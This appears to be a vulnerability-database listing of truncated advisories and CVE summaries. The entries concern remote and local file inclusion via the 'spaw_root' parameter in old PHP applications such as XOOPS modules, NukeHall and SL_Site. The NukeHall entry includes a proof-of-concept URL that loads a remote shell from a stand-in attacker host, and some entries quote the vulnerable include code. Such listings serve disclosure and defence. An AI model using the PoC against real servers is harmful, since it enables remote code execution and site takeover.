EUVD-2007-3279

Malware in sbrugna...

xoops module wiwimod 0.4 - Remote File Inclusion Vulnerability

No description provided by source. XOOPS Module WiwiMod v0.4 spawroot RFI Vulnerability D.Script: http://codigolivre.org.br/frs/download.php/1745/xoops2-modwiwimod0.4xavierjimenez.zip V.Code : include $spawroot.'config/spawcontrol.config.php'; include $spawroot.'class/toolbars.class.php'; include...

SL_Site <= 1.0 (spaw_root) Remote File Include Vulnerability

No description provided by source. --------------------------------------------------------------------------- SLSite = 1.0 spawroot Remote File Include Vulnerability --------------------------------------------------------------------------- Discovered By Kw3RLn Romanian Security Team :...

CVE-2009-4779

Multiple PHP remote file inclusion vulnerabilities in NukeHall 0.3 and earlier allow remote attackers to execute arbitrary PHP code via a URL in the spawroot parameter to 1 blocks.php, 2 messages.php, and 3 stories.php in admin/modules/...

NukeHall <= 0.3 Multiple Remote File Inclusion Vulnerabilities

Exploit for unknown platform in category web applications ============================================================== NukeHall PoC : http://server/path/admin/modules/blocks.php?spawroot=http://attacker.com/shell.txt?cmd Vuln : ./nukehall0.3/admin/modules/messages.php line 28 PoC :...

CAT2 - spaw_root Local File Inclusion

CAT2 - spawroot Local File Inclusion @===========================================@ | Author = StAkeR [email protected] | @===========================================@ + @==========================================================================@ | CAT2 = 1.Local File Inclusion Vulnerability |...

CAT2 - &#039;spaw_root&#039; Local File Inclusion

@===========================================@ | Author = StAkeR [email protected] | @===========================================@ + @==========================================================================@ | CAT2 = 1.Local File Inclusion Vulnerability |...

SQLiteManager confirm.php spaw_root Parameter Remote File Inclusion

The remote host is running SQLiteManager, a web-based application for managing SQLite databases. The version of SQLiteManager installed on the remote host fails to sanitize user-supplied input to the 'spawroot' parameter of the 'spaw/dialogs/confirm.php' script before using it to include PHP code...

CVE-2007-3289

PHP remote file inclusion vulnerability in spaw/spawcontrol.class.php in the WiwiMod 0.4 module for XOOPS allows remote attackers to execute arbitrary PHP code via a URL in the spawroot parameter. NOTE: this issue is probably a duplicate of CVE-2006-4656...

XOOPS Module WiwiMod 0.4 Remote File Inclusion Vulnerability

Exploit for unknown platform in category web applications ============================================================ XOOPS Module WiwiMod 0.4 Remote File Inclusion Vulnerability ============================================================ XOOPS Module WiwiMod v0.4 spawroot RFI Vulnerability...

Remote file inclusion

PHP remote file inclusion vulnerability in admin/spaw/spawcontrol.class.php in the XT-Conteudo module for XOOPS allows remote attackers to execute arbitrary PHP code via a URL in the spawroot parameter. NOTE: this issue is probably a duplicate of CVE-2006-4656...

Remote file inclusion

PHP remote file inclusion vulnerability in admin/editor2/spawcontrol.class.php in the Cjay Content 3 module for XOOPS allows remote attackers to execute arbitrary PHP code via a URL in the spawroot parameter. NOTE: this may be a duplicate of CVE-2006-4656...

CVE-2007-3220

PHP remote file inclusion vulnerability in admin/editor2/spawcontrol.class.php in the Cjay Content 3 module for XOOPS allows remote attackers to execute arbitrary PHP code via a URL in the spawroot parameter. NOTE: this may be a duplicate of CVE-2006-4656...

CVE-2007-3221

PHP remote file inclusion vulnerability in admin/spaw/spawcontrol.class.php in the XT-Conteudo module for XOOPS allows remote attackers to execute arbitrary PHP code via a URL in the spawroot parameter. NOTE: this issue is probably a duplicate of CVE-2006-4656...

XOOPS Module XT-Conteudo (spaw_root) RFI Vulnerability

No description provided by source. / \ / \ | | | | | | | | | | | / | | | | | | | ' / | | ' \ / \ | | | | || | || | | | \ | | | | / | , |/ /|| ||| |||| / | |/ INFO: Program Title XT-Conteudo XOOPS Module Remote File Inclusion&n...

XOOPS Module XT-Conteudo - spaw_root Remote File Inclusion

XOOPS Module XT-Conteudo - spawroot Remote File Inclusion / \ / \ | | | | | | | | | | | / | | | | | | | ' / | | ' \ / \ | | | | || | || | | | \ | | | | / | , |/ /|| ||| |||| / | |/ INFO: Program Title XT-Conteudo XOOPS Module Remote File Inclusion Vulnerability Description Content module for...

XOOPS Module XT-Conteudo (spaw_root) RFI Vulnerability

Exploit for unknown platform in category web applications ====================================================== XOOPS Module XT-Conteudo spawroot RFI Vulnerability ====================================================== / \ / \ | | | | | | | | | | | / | | | | | | | ' / | | ' \ / \ | | | | || | ||...

CVE-2007-2255

Multiple PHP remote file inclusion vulnerabilities in Download-Engine 1.4.3 allow remote attackers to execute arbitrary PHP code via a URL in the 1 engdir parameter to addmember.php, 2 langpath parameter to admin/enginelib/class.phpmailer.php, and the 3 spawroot parameter to...

CVE-2006-5291

PHP remote file inclusion vulnerability in admin/includes/spaw/spawcontrol.class.php in Download-Engine 1.4.2 allows remote attackers to execute arbitrary PHP code via a URL in the spawroot parameter. NOTE: CVE analysis suggests that this issue is actually in a third party product, SPAW Editor PH...

SL_Site 1.0 - &#039;spaw_root&#039; Remote File Inclusion

--------------------------------------------------------------------------- SLSite = 1.0 spawroot Remote File Include Vulnerability --------------------------------------------------------------------------- Discovered By Kw3RLn Romanian Security Team : hTTp://RST-CREW.net : Remote : Yes Critical...